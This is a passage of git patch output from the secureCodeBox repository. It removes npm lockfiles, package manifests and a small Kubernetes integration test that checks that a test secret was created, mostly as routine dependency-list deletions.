"sha512-wKyQRQpjJ0sIp62ErSZdGsjMJWsap5oRNihHhu6G7JVO/9jIB6UyevL+tXuOqrng8j/cxKTWyWUwvSTriiZz/g==", - "requires": { - "emoji-regex": "^8.0.0", - "is-fullwidth-code-point": "^3.0.0", - "strip-ansi": "^6.0.1" - } - }, - "strip-ansi": { - "version": "6.0.1", - "resolved": "https://registry.npmjs.org/strip-ansi/-/strip-ansi-6.0.1.tgz", - "integrity": "sha512-Y38VPSHcqkFrCpFnQ9vuSXmquuv5oXOKpGeT6aGrr3o3Gc9AlVa6JBfUSOCnbxGGZF+/0ooI7KrPuUSztUdU5A==", - "requires": { - "ansi-regex": "^5.0.1" - } - }, - "strip-ansi-cjs": { - "version": "npm:strip-ansi@6.0.1", - "resolved": "https://registry.npmjs.org/strip-ansi/-/strip-ansi-6.0.1.tgz", - "integrity": "sha512-Y38VPSHcqkFrCpFnQ9vuSXmquuv5oXOKpGeT6aGrr3o3Gc9AlVa6JBfUSOCnbxGGZF+/0ooI7KrPuUSztUdU5A==", - "requires": { - "ansi-regex": "^5.0.1" - } - }, - "strip-bom": { - "version": "4.0.0", - "resolved": "https://registry.npmjs.org/strip-bom/-/strip-bom-4.0.0.tgz", - "integrity": "sha512-3xurFv5tEgii33Zi8Jtp55wEIILR9eh34FAW00PZf+JnSsTmV/ioewSgQl97JHvgjoRGwPShsWm+IdrxB35d0w==", - "dev": true - }, - "strip-final-newline": { - "version": "2.0.0", - "resolved": "https://registry.npmjs.org/strip-final-newline/-/strip-final-newline-2.0.0.tgz", - "integrity": "sha512-BrpvfNAE3dcvq7ll3xVumzjKjZQ5tI1sEUIKr3Uoks0XUl45St3FlatVqef9prk4jRDzhW6WZg+3bk93y6pLjA==", - "dev": true - }, - "strip-json-comments": { - "version": "3.1.1", - "resolved": "https://registry.npmjs.org/strip-json-comments/-/strip-json-comments-3.1.1.tgz", - "integrity": "sha512-6fPc+R4ihwqP6N/aIv2f1gMH8lOVtWQHoqC4yK6oSDVVocumAsfCqjkXnqiYMhmMwS/mEHLp7Vehlt3ql6lEig==", - "dev": true - }, - "supports-color": { - "version": "7.2.0", - "resolved": "https://registry.npmjs.org/supports-color/-/supports-color-7.2.0.tgz", - "integrity": "sha512-qpCAvRl9stuOHveKsn7HncJRvv501qIacKzQlO/+Lwxc9+0q2wLyv4Dfvt80/DPn2pqOBsJdDiogXGR9+OvwRw==", - "dev": true, - "requires": { - "has-flag": "^4.0.0" - } - }, - "supports-preserve-symlinks-flag": { - "version": "1.0.0", - "resolved": "https://registry.npmjs.org/supports-preserve-symlinks-flag/-/supports-preserve-symlinks-flag-1.0.0.tgz", - "integrity": "sha512-ot0WnXS9fgdkgIcePe6RHNk1WA8+muPa6cSjeR3V8K27q9BB1rTE3R1p7Hv0z1ZyAc8s6Vvv8DIyWf681MAt0w==", - "dev": true - }, - "tar": { - "version": "7.4.3", - "resolved": "https://registry.npmjs.org/tar/-/tar-7.4.3.tgz", - "integrity": "sha512-5S7Va8hKfV7W5U6g3aYxXmlPoZVAwUMy9AOKyF2fVuZa2UD3qZjg578OrLRt8PcNN1PleVaL/5/yYATNL0ICUw==", - "requires": { - "@isaacs/fs-minipass": "^4.0.0", - "chownr": "^3.0.0", - "minipass": "^7.1.2", - "minizlib": "^3.0.1", - "mkdirp": "^3.0.1", - "yallist": "^5.0.0" - }, - "dependencies": { - "yallist": { - "version": "5.0.0", - "resolved": "https://registry.npmjs.org/yallist/-/yallist-5.0.0.tgz", - "integrity": "sha512-YgvUTfwqyc7UXVMrB+SImsVYSmTS8X/tSrtdNZMImM+n7+QTriRXyXim0mBrTXNeqzVF0KWGgHPeiyViFFrNDw==" - } - } - }, - "test-exclude": { - "version": "6.0.0", - "resolved": "https://registry.npmjs.org/test-exclude/-/test-exclude-6.0.0.tgz", - "integrity": "sha512-cAGWPIyOHU6zlmg88jwm7VRyXnMN7iV68OGAbYDk/Mh/xC/pzVPlQtY6ngoIH/5/tciuhGfvESU8GrHrcxD56w==", - "dev": true, - "requires": { - "@istanbuljs/schema": "^0.1.2", - "glob": "^7.1.4", - "minimatch": "^3.0.4" - } - }, - "text-table": { - "version": "0.2.0", - "resolved": "https://registry.npmjs.org/text-table/-/text-table-0.2.0.tgz", - "integrity": "sha512-N+8UisAXDGk8PFXP4HAzVR9nbfmVJ3zYLAWiTIoqC5v5isinhr+r5uaO8+7r3BMfuNIufIsA7RdpVgacC2cSpw==", - "dev": true, - "peer": true - }, - "throat": { - "version": "6.0.2", - "resolved": "https://registry.npmjs.org/throat/-/throat-6.0.2.tgz", - "integrity": "sha512-WKexMoJj3vEuK0yFEapj8y64V0A6xcuPuK9Gt1d0R+dzCSJc0lHqQytAbSB4cDAK0dWh4T0E2ETkoLE2WZ41OQ==", - "dev": true - }, - "tmpl": { - "version": "1.0.5", - "resolved": "https://registry.npmjs.org/tmpl/-/tmpl-1.0.5.tgz", - "integrity": "sha512-3f0uOEAQwIqGuWW2MVzYg8fV/QNnc/IpuJNG837rLuczAaLVHslWHZQj4IGiEl5Hs3kkbhwL9Ab7Hrsmuj+Smw==", - "dev": true - }, - "to-regex-range": { - "version": "5.0.1", - "resolved": "https://registry.npmjs.org/to-regex-range/-/to-regex-range-5.0.1.tgz", - "integrity": "sha512-65P7iz6X5yEr1cwcgvQxbbIw7Uk3gOy5dIdtZ4rDveLqhrdJP+Li/Hx6tyK0NEb+2GCyneCMJiGqrADCSNk8sQ==", - "dev": true, - "requires": { - "is-number": "^7.0.0" - } - }, - "tough-cookie": { - "version": "2.5.0", - "resolved": "https://registry.npmjs.org/tough-cookie/-/tough-cookie-2.5.0.tgz", - "integrity": "sha512-nlLsUzgm1kfLXSXfRZMc1KLAugd4hqJHDTvc2hDIwS3mZAfMEuMbc03SujMF+GEcpaX/qboeycw6iO8JwVv2+g==", - "requires": { - "psl": "^1.1.28", - "punycode": "^2.1.1" - } - }, - "tslib": { - "version": "2.4.1", - "resolved": "https://registry.npmjs.org/tslib/-/tslib-2.4.1.tgz", - "integrity": "sha512-tGyy4dAjRIEwI7BzsB0lynWgOpfqjUdq91XXAlIWD2OwKBH7oCl/GZG/HT4BOHrTlPMOASlMQ7veyTqpmRcrNA==" - }, - "tunnel-agent": { - "version": "0.6.0", - "resolved": "https://registry.npmjs.org/tunnel-agent/-/tunnel-agent-0.6.0.tgz", - "integrity": "sha512-McnNiV1l8RYeY8tBgEpuodCC1mLUdbSN+CYBL7kJsJNInOP8UjDDEwdk6Mw60vdLLrr5NHKZhMAOSrR2NZuQ+w==", - "requires": { - "safe-buffer": "^5.0.1" - } - }, - "tweetnacl": { - "version": "0.14.5", - "resolved": "https://registry.npmjs.org/tweetnacl/-/tweetnacl-0.14.5.tgz", - "integrity": "sha512-KXXFFdAbFXY4geFIwoyNK+f5Z1b7swfXABfL7HXCmoIWMKU3dmS26672A4EeQtDzLKy7SXmfBu51JolvEKwtGA==" - }, - "type-check": { - "version": "0.4.0", - "resolved": "https://registry.npmjs.org/type-check/-/type-check-0.4.0.tgz", - "integrity": "sha512-XleUoc9uwGXqjWwXaUTZAmzMcFZ5858QA2vvx1Ur5xIcixXIP+8LnFDgRplU30us6teqdlskFfu+ae4K79Ooew==", - "dev": true, - "peer": true, - "requires": { - "prelude-ls": "^1.2.1" - } - }, - "type-detect": { - "version": "4.0.8", - "resolved": "https://registry.npmjs.org/type-detect/-/type-detect-4.0.8.tgz", - "integrity": "sha512-0fr/mIH1dlO+x7TlcMy+bIDqKPsw/70tVyeHW787goQjhmqaZe10uwLujubK9q9Lg6Fiho1KUKDYz0Z7k7g5/g==", - "dev": true - }, - "type-fest": { - "version": "0.20.2", - "resolved": "https://registry.npmjs.org/type-fest/-/type-fest-0.20.2.tgz", - "integrity": "sha512-Ne+eE4r0/iWnpAxD852z3A+N0Bt5RN//NjJwRd2VFHEmrywxf5vsZlh4R6lixl6B+wz/8d+maTSAkN1FIkI3LQ==", - "dev": true, - "peer": true - }, - "undici-types": { - "version": "6.20.0", - "resolved": "https://registry.npmjs.org/undici-types/-/undici-types-6.20.0.tgz", - "integrity": "sha512-Ny6QZ2Nju20vw1SRHe3d9jVu6gJ+4e3+MMpqu7pqE5HT6WsTSlce++GQmK5UXS8mzV8DSYHrQH+Xrf2jVcuKNg==", - "dev": true - }, - "update-browserslist-db": { - "version": "1.1.1", - "resolved": "https://registry.npmjs.org/update-browserslist-db/-/update-browserslist-db-1.1.1.tgz", - "integrity": "sha512-R8UzCaa9Az+38REPiJ1tXlImTJXlVfgHZsglwBD/k6nj76ctsH1E3q4doGrukiLQd3sGQYu56r5+lo5r94l29A==", - "dev": true, - "requires": { - "escalade": "^3.2.0", - "picocolors": "^1.1.0" - } - }, - "uri-js": { - "version": "4.4.1", - "resolved": "https://registry.npmjs.org/uri-js/-/uri-js-4.4.1.tgz", - "integrity": "sha512-7rKUyy33Q1yc98pQ1DAmLtwX109F7TIfWlW1Ydo8Wl1ii1SeHieeh0HHfPeL2fMXK6z0s8ecKs9frCuLJvndBg==", - "requires": { - "punycode": "^2.1.0" - } - }, - "uuid": { - "version": "3.4.0", - "resolved": "https://registry.npmjs.org/uuid/-/uuid-3.4.0.tgz", - "integrity": "sha512-HjSDRw6gZE5JMggctHBcjVak08+KEVhSIiDzFnT9S9aegmp85S/bReBVTb4QTFaRNptJ9kuYaNhnbNEOkbKb/A==" - }, - "v8-to-istanbul": { - "version": "9.3.0", - "resolved": "https://registry.npmjs.org/v8-to-istanbul/-/v8-to-istanbul-9.3.0.tgz", - "integrity": "sha512-kiGUalWN+rgBJ/1OHZsBtU4rXZOfj/7rKQxULKlIzwzQSvMJUUNgPwJEEh7gU6xEVxC0ahoOBvN2YI8GH6FNgA==", - "dev": true, - "requires": { - "@jridgewell/trace-mapping": "^0.3.12", - "@types/istanbul-lib-coverage": "^2.0.1", - "convert-source-map": "^2.0.0" - } - }, - "verror": { - "version": "1.10.0", - "resolved": "https://registry.npmjs.org/verror/-/verror-1.10.0.tgz", - "integrity": "sha512-ZZKSmDAEFOijERBLkmYfJ+vmk3w+7hOLYDNkRCuRuMJGEmqYNCNLyBBFwWKVMhfwaEF3WOd0Zlw86U/WC/+nYw==", - "requires": { - "assert-plus": "^1.0.0", - "core-util-is": "1.0.2", - "extsprintf": "^1.2.0" - } - }, - "walker": { - "version": "1.0.8", - "resolved": "https://registry.npmjs.org/walker/-/walker-1.0.8.tgz", - "integrity": "sha512-ts/8E8l5b7kY0vlWLewOkDXMmPdLcVV4GmOQLyxuSswIJsweeFZtAsMF7k1Nszz+TYBQrlYRmzOnr398y1JemQ==", - "dev": true, - "requires": { - "makeerror": "1.0.12" - } - }, - "which": { - "version": "2.0.2", - "resolved": "https://registry.npmjs.org/which/-/which-2.0.2.tgz", - "integrity": "sha512-BLI3Tl1TW3Pvl70l3yq3Y64i+awpwXqsGBYWkkqMtnbXgrMD+yj7rhW0kuEDxzJaYXGjEW5ogapKNMEKNMjibA==", - "requires": { - "isexe": "^2.0.0" - } - }, - "wrap-ansi": { - "version": "7.0.0", - "resolved": "https://registry.npmjs.org/wrap-ansi/-/wrap-ansi-7.0.0.tgz", - "integrity": "sha512-YVGIj2kamLSTxw6NsZjoBxfSwsn0ycdesmc4p+Q21c5zPuZ1pl+NfxVdxPtdHvmNVOQ6XSYG4AUtyt/Fi7D16Q==", - "dev": true, - "requires": { - "ansi-styles": "^4.0.0", - "string-width": "^4.1.0", - "strip-ansi": "^6.0.0" - } - }, - "wrap-ansi-cjs": { - "version": "npm:wrap-ansi@7.0.0", - "resolved": "https://registry.npmjs.org/wrap-ansi/-/wrap-ansi-7.0.0.tgz", - "integrity": "sha512-YVGIj2kamLSTxw6NsZjoBxfSwsn0ycdesmc4p+Q21c5zPuZ1pl+NfxVdxPtdHvmNVOQ6XSYG4AUtyt/Fi7D16Q==", - "requires": { - "ansi-styles": "^4.0.0", - "string-width": "^4.1.0", - "strip-ansi": "^6.0.0" - } - }, - "wrappy": { - "version": "1.0.2", - "resolved": "https://registry.npmjs.org/wrappy/-/wrappy-1.0.2.tgz", - "integrity": "sha512-l4Sp/DRseor9wL6EvV2+TuQn63dMkPjZ/sp9XkghTEbV9KlPS1xUsZ3u7/IQO4wxtcFB4bgpQPRcR3QCvezPcQ==", - "dev": true - }, - "write-file-atomic": { - "version": "4.0.2", - "resolved": "https://registry.npmjs.org/write-file-atomic/-/write-file-atomic-4.0.2.tgz", - "integrity": "sha512-7KxauUdBmSdWnmpaGFg+ppNjKF8uNLry8LyzjauQDOVONfFLNKrKvQOxZ/VuTIcS/gge/YNahf5RIIQWTSarlg==", - "dev": true, - "requires": { - "imurmurhash": "^0.1.4", - "signal-exit": "^3.0.7" - } - }, - "ws": { - "version": "8.18.0", - "resolved": "https://registry.npmjs.org/ws/-/ws-8.18.0.tgz", - "integrity": "sha512-8VbfWfHLbbwu3+N6OKsOMpBdT4kXPDDB9cJk2bJ6mh9ucxdlnNvH1e+roYkKmN9Nxw2yjz7VzeO9oOz2zJ04Pw==", - "requires": {} - }, - "y18n": { - "version": "5.0.8", - "resolved": "https://registry.npmjs.org/y18n/-/y18n-5.0.8.tgz", - "integrity": "sha512-0pfFzegeDWJHJIAmTLRP2DwHjdF5s7jo9tuztdQxAhINCdvS+3nGINqPd00AphqJR/0LhANUS6/+7SCb98YOfA==", - "dev": true - }, - "yallist": { - "version": "3.1.1", - "resolved": "https://registry.npmjs.org/yallist/-/yallist-3.1.1.tgz", - "integrity": "sha512-a4UGQaWPH59mOXUYnAG2ewncQS4i4F43Tv3JoAM+s2VDAmS9NsK8GpDMLrCHPksFT7h3K6TOoUNn2pb7RoXx4g==", - "dev": true - }, - "yaml": { - "version": "1.10.2", - "resolved": "https://registry.npmjs.org/yaml/-/yaml-1.10.2.tgz", - "integrity": "sha512-r3vXyErRCYJ7wg28yvBY5VSoAF8ZvlcW9/BwUzEtUsjvX/DKs24dIkuwjtuprwJJHsbyUbLApepYTR1BN4uHrg==", - "dev": true - }, - "yargs": { - "version": "17.7.2", - "resolved": "https://registry.npmjs.org/yargs/-/yargs-17.7.2.tgz", - "integrity": "sha512-7dSzzRQ++CKnNI/krKnYRV7JKKPUXMEh61soaHKg9mrWEhzFWhFnxPxGl+69cD1Ou63C13NUPCnmIcrvqCuM6w==", - "dev": true, - "requires": { - "cliui": "^8.0.1", - "escalade": "^3.1.1", - "get-caller-file": "^2.0.5", - "require-directory": "^2.1.1", - "string-width": "^4.2.3", - "y18n": "^5.0.5", - "yargs-parser": "^21.1.1" - } - }, - "yargs-parser": { - "version": "21.1.1", - "resolved": "https://registry.npmjs.org/yargs-parser/-/yargs-parser-21.1.1.tgz", - "integrity": "sha512-tVpsJW7DdjecAiFpbIB1e3qxIQsE6NoPc5/eTdrbbIC4h0LVsWhnoa3g+m2HclBIujHzsxZ4VJVA+GUuc2/LBw==", - "dev": true - }, - "yocto-queue": { - "version": "0.1.0", - "resolved": "https://registry.npmjs.org/yocto-queue/-/yocto-queue-0.1.0.tgz", - "integrity": "sha512-rVksvsnNCdJ/ohGc6xgPwyN8eheCxsiLM8mxuE/t/mOVqJewPuO1miLpTHQiRgTKCLexL4MeAFVagts7HmNZ2Q==", - "dev": true - } - } -} diff --git a/auto-discovery/kubernetes/pull-secret-extractor/integration-test/package-lock.json.license b/auto-discovery/kubernetes/pull-secret-extractor/integration-test/package-lock.json.license deleted file mode 100644 index 3034c0d74b..0000000000 --- a/auto-discovery/kubernetes/pull-secret-extractor/integration-test/package-lock.json.license +++ /dev/null @@ -1,3 +0,0 @@ -SPDX-FileCopyrightText: the secureCodeBox authors - -SPDX-License-Identifier: Apache-2.0 \ No newline at end of file diff --git a/auto-discovery/kubernetes/pull-secret-extractor/integration-test/package.json b/auto-discovery/kubernetes/pull-secret-extractor/integration-test/package.json deleted file mode 100644 index 448a77429d..0000000000 --- a/auto-discovery/kubernetes/pull-secret-extractor/integration-test/package.json +++ /dev/null @@ -1,18 +0,0 @@ -{ - "name": "securecodebox-pull-secret-extractor-test", - "version": "1.0.0", - "description": "", - "scripts": { - "test": "pull-secret-extraction.test.js", - "test:integration": "jest --verbose --ci --colors --coverage --passWithNoTests" - }, - "author": "iteratec GmbH", - "license": "Apache-2.0", - "dependencies": { - "@kubernetes/client-node": "^0.22.3" - }, - "devDependencies": { - "jest": "^29.7.0", - "jest-runner-eslint": "^2.2.1" - } -} diff --git a/auto-discovery/kubernetes/pull-secret-extractor/integration-test/package.json.license b/auto-discovery/kubernetes/pull-secret-extractor/integration-test/package.json.license deleted file mode 100644 index 3034c0d74b..0000000000 --- a/auto-discovery/kubernetes/pull-secret-extractor/integration-test/package.json.license +++ /dev/null @@ -1,3 +0,0 @@ -SPDX-FileCopyrightText: the secureCodeBox authors - -SPDX-License-Identifier: Apache-2.0 \ No newline at end of file diff --git a/auto-discovery/kubernetes/pull-secret-extractor/integration-test/pull-secret-extraction.test.js b/auto-discovery/kubernetes/pull-secret-extractor/integration-test/pull-secret-extraction.test.js deleted file mode 100644 index 2ce6990b25..0000000000 --- a/auto-discovery/kubernetes/pull-secret-extractor/integration-test/pull-secret-extraction.test.js +++ /dev/null @@ -1,26 +0,0 @@ -// SPDX-FileCopyrightText: the secureCodeBox authors -// -// SPDX-License-Identifier: Apache-2.0 - -const k8s = require("@kubernetes/client-node"); - -const kc = new k8s.KubeConfig(); -kc.loadFromDefault(); - -const k8sPodsApi = kc.makeApiClient(k8s.CoreV1Api); - -test( - "Test if initcontainer creates correct secrets", - async () => { - let secret; - try { - secret = await k8sPodsApi.readNamespacedSecret( - "test-secret", - "integration-test" - ); - } finally { - expect(secret).toBeDefined(); - } - }, - 60 * 1000 -); From a082eff15ed5e336b63831e1b9b83e83edc77d52 Mon Sep 17 00:00:00 2001 From: Jannik Hollenbach Date: Thu, 10 Jul 2025 18:35:15 +0200 Subject: [PATCH 119/137] Delete leftover jest call --- hooks/finding-post-processing/hook/package.json | 4 +--- 1 file changed, 1 insertion(+), 3 deletions(-) diff --git a/hooks/finding-post-processing/hook/package.json b/hooks/finding-post-processing/hook/package.json index 7b2dcbe7e9..9d7a938e68 100644 --- a/hooks/finding-post-processing/hook/package.json +++ b/hooks/finding-post-processing/hook/package.json @@ -3,9 +3,7 @@ "version": "1.0.0", "description": "secureCodeBox Finding Post Processing Hook", "main": "hook.js", - "scripts": { - "test": "jest --verbose --ci --colors --coverage --passWithNoTests" - }, + "scripts": {}, "repository": { "type": "git", "url": "git+https://github.com/secureCodeBox/secureCodeBox.git" From f8b553dee508c38fe206e6bb0061584c2c0145a9 Mon Sep 17 00:00:00 2001 From: Jannik Hollenbach Date: Thu, 10 Jul 2025 18:35:49 +0200 Subject: [PATCH 120/137] Remove top level package json Seems pretty much unused now. Linter would be good to bring back but doesn't work in it's current form :( --- package-lock.json | 10841 ------------------------------------ package-lock.json.license | 3 - package.json | 55 - package.json.license | 3 - 4 files changed, 10902 deletions(-) delete mode 100644 package-lock.json delete mode 100644 package-lock.json.license delete mode 100644 package.json delete mode 100644 package.json.license diff --git a/package-lock.json b/package-lock.json deleted file mode 100644 index da552110cf..0000000000 --- a/package-lock.json +++ /dev/null @@ -1,10841 +0,0 @@ -{ - "name": "@securecodebox/securecodebox", - "version": "1.0.1", - "lockfileVersion": 2, - "requires": true, - "packages": { - "": { - "name": "@securecodebox/securecodebox", - "version": "1.0.1", - "license": "Apache-2.0", - "dependencies": { - "@kubernetes/client-node": "^0.22.3" - }, - "devDependencies": { - "@types/jest": "^29.5.14", - "@types/node": "^22.10.2", - "jest": "^29.7.0", - "jest-runner-eslint": "^2.2.1", - "prettier": "^3.4.2", - "ts-jest": "^29.2.5", - "typescript": "^5.7.2" - } - }, - "node_modules/@ampproject/remapping": { - "version": "2.3.0", - "resolved": "https://registry.npmjs.org/@ampproject/remapping/-/remapping-2.3.0.tgz", - "integrity": "sha512-30iZtAPgz+LTIYoeivqYo853f02jBYSd5uGnGpkFV0M3xOt9aN73erkgYAmZU43x4VfqcnLxW9Kpg3R5LC4YYw==", - "dev": true, - "dependencies": { - "@jridgewell/gen-mapping": "^0.3.5", - "@jridgewell/trace-mapping": "^0.3.24" - }, - "engines": { - "node": ">=6.0.0" - } - }, - "node_modules/@babel/code-frame": { - "version": "7.12.11", - "resolved": "https://registry.npmjs.org/@babel/code-frame/-/code-frame-7.12.11.tgz", - "integrity": "sha512-Zt1yodBx1UcyiePMSkWnU4hPqhwq7hGi2nFL1LeA3EUl+q2LQx16MISgJ0+z7dnmgvP9QtIleuETGOiOH1RcIw==", - "dev": true, - "dependencies": { - "@babel/highlight": "^7.10.4" - } - }, - "node_modules/@babel/compat-data": { - "version": "7.24.4", - "resolved": "https://registry.npmjs.org/@babel/compat-data/-/compat-data-7.24.4.tgz", - "integrity": "sha512-vg8Gih2MLK+kOkHJp4gBEIkyaIi00jgWot2D9QOmmfLC8jINSOzmCLta6Bvz/JSBCqnegV0L80jhxkol5GWNfQ==", - "dev": true, - "engines": { - "node": ">=6.9.0" - } - }, - "node_modules/@babel/core": { - "version": "7.24.4", - "resolved": "https://registry.npmjs.org/@babel/core/-/core-7.24.4.tgz", - "integrity": "sha512-MBVlMXP+kkl5394RBLSxxk/iLTeVGuXTV3cIDXavPpMMqnSnt6apKgan/U8O3USWZCWZT/TbgfEpKa4uMgN4Dg==", - "dev": true, - "dependencies": { - "@ampproject/remapping": "^2.2.0", - "@babel/code-frame": "^7.24.2", - "@babel/generator": "^7.24.4", - "@babel/helper-compilation-targets": "^7.23.6", - "@babel/helper-module-transforms": "^7.23.3", - "@babel/helpers": "^7.24.4", - "@babel/parser": "^7.24.4", - "@babel/template": "^7.24.0", - "@babel/traverse": "^7.24.1", - "@babel/types": "^7.24.0", - "convert-source-map": "^2.0.0", - "debug": "^4.1.0", - "gensync": "^1.0.0-beta.2", - "json5": "^2.2.3", - "semver": "^6.3.1" - }, - "engines": { - "node": ">=6.9.0" - }, - "funding": { - "type": "opencollective", - "url": "https://opencollective.com/babel" - } - }, - "node_modules/@babel/core/node_modules/@babel/code-frame": { - "version": "7.24.2", - "resolved": "https://registry.npmjs.org/@babel/code-frame/-/code-frame-7.24.2.tgz", - "integrity": "sha512-y5+tLQyV8pg3fsiln67BVLD1P13Eg4lh5RW9mF0zUuvLrv9uIQ4MCL+CRT+FTsBlBjcIan6PGsLcBN0m3ClUyQ==", - "dev": true, - "dependencies": { - "@babel/highlight": "^7.24.2", - "picocolors": "^1.0.0" - }, - "engines": { - "node": ">=6.9.0" - } - }, - "node_modules/@babel/core/node_modules/semver": { - "version": "6.3.1", - "resolved": "https://registry.npmjs.org/semver/-/semver-6.3.1.tgz", - "integrity": "sha512-BR7VvDCVHO+q2xBEWskxS6DJE1qRnb7DxzUrogb71CWoSficBxYsiAGd+Kl0mmq/MprG9yArRkyrQxTO6XjMzA==", - "dev": true, - "bin": { - "semver": "bin/semver.js" - } - }, - "node_modules/@babel/generator": { - "version": "7.24.4", - "resolved": "https://registry.npmjs.org/@babel/generator/-/generator-7.24.4.tgz", - "integrity": "sha512-Xd6+v6SnjWVx/nus+y0l1sxMOTOMBkyL4+BIdbALyatQnAe/SRVjANeDPSCYaX+i1iJmuGSKf3Z+E+V/va1Hvw==", - "dev": true, - "dependencies": { - "@babel/types": "^7.24.0", - "@jridgewell/gen-mapping": "^0.3.5", - "@jridgewell/trace-mapping": "^0.3.25", - "jsesc": "^2.5.1" - }, - "engines": { - "node": ">=6.9.0" - } - }, - "node_modules/@babel/helper-compilation-targets": { - "version": "7.23.6", - "resolved": "https://registry.npmjs.org/@babel/helper-compilation-targets/-/helper-compilation-targets-7.23.6.tgz", - "integrity": "sha512-9JB548GZoQVmzrFgp8o7KxdgkTGm6xs9DW0o/Pim72UDjzr5ObUQ6ZzYPqA+g9OTS2bBQoctLJrky0RDCAWRgQ==", - "dev": true, - "dependencies": { - "@babel/compat-data": "^7.23.5", - "@babel/helper-validator-option": "^7.23.5", - "browserslist": "^4.22.2", - "lru-cache": "^5.1.1", - "semver": "^6.3.1" - }, - "engines": { - "node": ">=6.9.0" - } - }, - "node_modules/@babel/helper-compilation-targets/node_modules/lru-cache": { - "version": "5.1.1", - "resolved": "https://registry.npmjs.org/lru-cache/-/lru-cache-5.1.1.tgz", - "integrity": "sha512-KpNARQA3Iwv+jTA0utUVVbrh+Jlrr1Fv0e56GGzAFOXN7dk/FviaDW8LHmK52DlcH4WP2n6gI8vN1aesBFgo9w==", - "dev": true, - "dependencies": { - "yallist": "^3.0.2" - } - }, - "node_modules/@babel/helper-compilation-targets/node_modules/semver": { - "version": "6.3.1", - "resolved": "https://registry.npmjs.org/semver/-/semver-6.3.1.tgz", - "integrity": "sha512-BR7VvDCVHO+q2xBEWskxS6DJE1qRnb7DxzUrogb71CWoSficBxYsiAGd+Kl0mmq/MprG9yArRkyrQxTO6XjMzA==", - "dev": true, - "bin": { - "semver": "bin/semver.js" - } - }, - "node_modules/@babel/helper-compilation-targets/node_modules/yallist": { - "version": "3.1.1", - "resolved": "https://registry.npmjs.org/yallist/-/yallist-3.1.1.tgz", - "integrity": "sha512-a4UGQaWPH59mOXUYnAG2ewncQS4i4F43Tv3JoAM+s2VDAmS9NsK8GpDMLrCHPksFT7h3K6TOoUNn2pb7RoXx4g==", - "dev": true - }, - "node_modules/@babel/helper-environment-visitor": { - "version": "7.22.20", - "resolved": "https://registry.npmjs.org/@babel/helper-environment-visitor/-/helper-environment-visitor-7.22.20.tgz", - "integrity": "sha512-zfedSIzFhat/gFhWfHtgWvlec0nqB9YEIVrpuwjruLlXfUSnA8cJB0miHKwqDnQ7d32aKo2xt88/xZptwxbfhA==", - "dev": true, - "engines": { - "node": ">=6.9.0" - } - }, - "node_modules/@babel/helper-function-name": { - "version": "7.23.0", - "resolved": "https://registry.npmjs.org/@babel/helper-function-name/-/helper-function-name-7.23.0.tgz", - "integrity": "sha512-OErEqsrxjZTJciZ4Oo+eoZqeW9UIiOcuYKRJA4ZAgV9myA+pOXhhmpfNCKjEH/auVfEYVFJ6y1Tc4r0eIApqiw==", - "dev": true, - "dependencies": { - "@babel/template": "^7.22.15", - "@babel/types": "^7.23.0" - }, - "engines": { - "node": ">=6.9.0" - } - }, - "node_modules/@babel/helper-hoist-variables": { - "version": "7.22.5", - "resolved": "https://registry.npmjs.org/@babel/helper-hoist-variables/-/helper-hoist-variables-7.22.5.tgz", - "integrity": "sha512-wGjk9QZVzvknA6yKIUURb8zY3grXCcOZt+/7Wcy8O2uctxhplmUPkOdlgoNhmdVee2c92JXbf1xpMtVNbfoxRw==", - "dev": true, - "dependencies": { - "@babel/types": "^7.22.5" - }, - "engines": { - "node": ">=6.9.0" - } - }, - "node_modules/@babel/helper-module-imports": { - "version": "7.24.3", - "resolved": "https://registry.npmjs.org/@babel/helper-module-imports/-/helper-module-imports-7.24.3.tgz", - "integrity": "sha512-viKb0F9f2s0BCS22QSF308z/+1YWKV/76mwt61NBzS5izMzDPwdq1pTrzf+Li3npBWX9KdQbkeCt1jSAM7lZqg==", - "dev": true, - "dependencies": { - "@babel/types": "^7.24.0" - }, - "engines": { - "node": ">=6.9.0" - } - }, - "node_modules/@babel/helper-module-transforms": { - "version": "7.23.3", - "resolved": "https://registry.npmjs.org/@babel/helper-module-transforms/-/helper-module-transforms-7.23.3.tgz", - "integrity": "sha512-7bBs4ED9OmswdfDzpz4MpWgSrV7FXlc3zIagvLFjS5H+Mk7Snr21vQ6QwrsoCGMfNC4e4LQPdoULEt4ykz0SRQ==", - "dev": true, - "dependencies": { - "@babel/helper-environment-visitor": "^7.22.20", - "@babel/helper-module-imports": "^7.22.15", - "@babel/helper-simple-access": "^7.22.5", - "@babel/helper-split-export-declaration": "^7.22.6", - "@babel/helper-validator-identifier": "^7.22.20" - }, - "engines": { - "node": ">=6.9.0" - }, - "peerDependencies": { - "@babel/core": "^7.0.0" - } - }, - "node_modules/@babel/helper-plugin-utils": { - "version": "7.24.0", - "resolved": "https://registry.npmjs.org/@babel/helper-plugin-utils/-/helper-plugin-utils-7.24.0.tgz", - "integrity": "sha512-9cUznXMG0+FxRuJfvL82QlTqIzhVW9sL0KjMPHhAOOvpQGL8QtdxnBKILjBqxlHyliz0yCa1G903ZXI/FuHy2w==", - "dev": true, - "engines": { - "node": ">=6.9.0" - } - }, - "node_modules/@babel/helper-simple-access": { - "version": "7.22.5", - "resolved": "https://registry.npmjs.org/@babel/helper-simple-access/-/helper-simple-access-7.22.5.tgz", - "integrity": "sha512-n0H99E/K+Bika3++WNL17POvo4rKWZ7lZEp1Q+fStVbUi8nxPQEBOlTmCOxW/0JsS56SKKQ+ojAe2pHKJHN35w==", - "dev": true, - "dependencies": { - "@babel/types": "^7.22.5" - }, - "engines": { - "node": ">=6.9.0" - } - }, - "node_modules/@babel/helper-split-export-declaration": { - "version": "7.22.6", - "resolved": "https://registry.npmjs.org/@babel/helper-split-export-declaration/-/helper-split-export-declaration-7.22.6.tgz", - "integrity": "sha512-AsUnxuLhRYsisFiaJwvp1QF+I3KjD5FOxut14q/GzovUe6orHLesW2C7d754kRm53h5gqrz6sFl6sxc4BVtE/g==", - "dev": true, - "dependencies": { - "@babel/types": "^7.22.5" - }, - "engines": { - "node": ">=6.9.0" - } - }, - "node_modules/@babel/helper-string-parser": { - "version": "7.24.1", - "resolved": "https://registry.npmjs.org/@babel/helper-string-parser/-/helper-string-parser-7.24.1.tgz", - "integrity": "sha512-2ofRCjnnA9y+wk8b9IAREroeUP02KHp431N2mhKniy2yKIDKpbrHv9eXwm8cBeWQYcJmzv5qKCu65P47eCF7CQ==", - "dev": true, - "engines": { - "node": ">=6.9.0" - } - }, - "node_modules/@babel/helper-validator-identifier": { - "version": "7.22.20", - "resolved": 